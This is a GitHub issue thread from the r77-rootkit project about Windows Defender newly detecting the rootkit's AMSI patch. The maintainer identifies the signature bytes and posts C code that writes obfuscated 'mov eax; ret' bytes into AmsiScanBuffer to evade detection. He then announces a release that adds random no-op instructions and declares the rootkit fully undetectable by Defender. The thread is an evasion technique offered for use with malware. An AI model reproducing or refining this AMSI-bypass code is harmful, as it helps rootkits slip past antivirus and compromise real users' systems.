### ISSUE TITLE
Patching AMSI is detected

### ISSUE THREAD

**Issue by qCorek** [bytecode77/r77-rootkit#110]
newest update of microsoft any patch to the amsiscanbuffer is being detected

source : https://practicalsecurityanalytics.com/obfuscating-api-patches-to-bypass-new-windows-defender-behavior-signatures/

**Comment by bytecode77** [comment]
This is interesting... Looks like a smart one from Microsoft if I understand it correctly. Funny though, that Windows Defender didn't detect r77 the past 6 months, yet it is proclaimed to be the best AV out there.

I can't stay on top of all counter measures, but I'll probably implement mutation of the commandline every hour or so.

**Comment by qCorek** [comment]
> This is interesting... Looks like a smart one from Microsoft if I understand it correctly. Funny though, that Windows Defender didn't detect r77 the past 6 months, yet it is proclaimed to be the best AV out there.
> 
> I can't stay on top of all counter measures, but I'll probably implement mutation of the commandline every hour or so.

update: no they are not so smart haha the byte 0xC3 is being detected only i tested it 1 by 1 to see which part its getting signatured i dont have much knowledge abt assembly

**Comment by bytecode77** [comment]
You're absolutely right! I was expecting something brilliant, but Microsoft simply decided to include this into the PS signature: `0xb8,0x57,0,7,0x80,0xc3`

So, the next version will include this modification:

```
if (Is64BitOperatingSystem())
{
	StrCatW(command, L"[Runtime.InteropServices.Marshal]::Copy([Byte[]](");

	// b8 57 00 07 80	mov		eax, 0x80070057
	// c3				ret
	WriteObfuscatedNumber(command, 0xb8);
	WriteObfuscatedNumber(command, 0x57);
	WriteObfuscatedNumber(command, 0x00);
	WriteObfuscatedNumber(command, 0x07);
	WriteObfuscatedNumber(command, 0x80);
	WriteObfuscatedNumber(command, 0xc3);

	StrCatW(command, L"),0,$AmsiScanBufferPtr,6);");
	[...]


VOID WriteObfuscatedNumber(LPWSTR command, DWORD number)
{
	LPBYTE rand[1];
	GetRandomBytes(rand, 1);

	DWORD a = rand[0];
	DWORD b = a - number;

	WCHAR buffer[10];
	StrCatW(command, Int32ToStrW(a, buffer));
	StrCatW(command, L"-");
	StrCatW(command, Int32ToStrW(b, buffer));
}
```

This is my primitive response to the primitive new signature. I somehow envy previous generations who didn't need to navigate such a maze... I'll post back when I have released the new version.

**Comment by bytecode77** [comment]
Happy new year!

**Version 1.5.5** is released today. I needed to both obfuscate the code that overwrites the `AmsiScanBuffer` function, as well as the actual bytes written to it. The post that you linked had the right clue: Windows Defender detects the `mov eax ret` gadget that overwrites `AmsiScanBuffer`, therefore I have intermingled some no-op like instructions, that are chosen at random (e.g. `mov eax, eax`)

As of today, r77 is FUD in Windows Defender. Have fun!
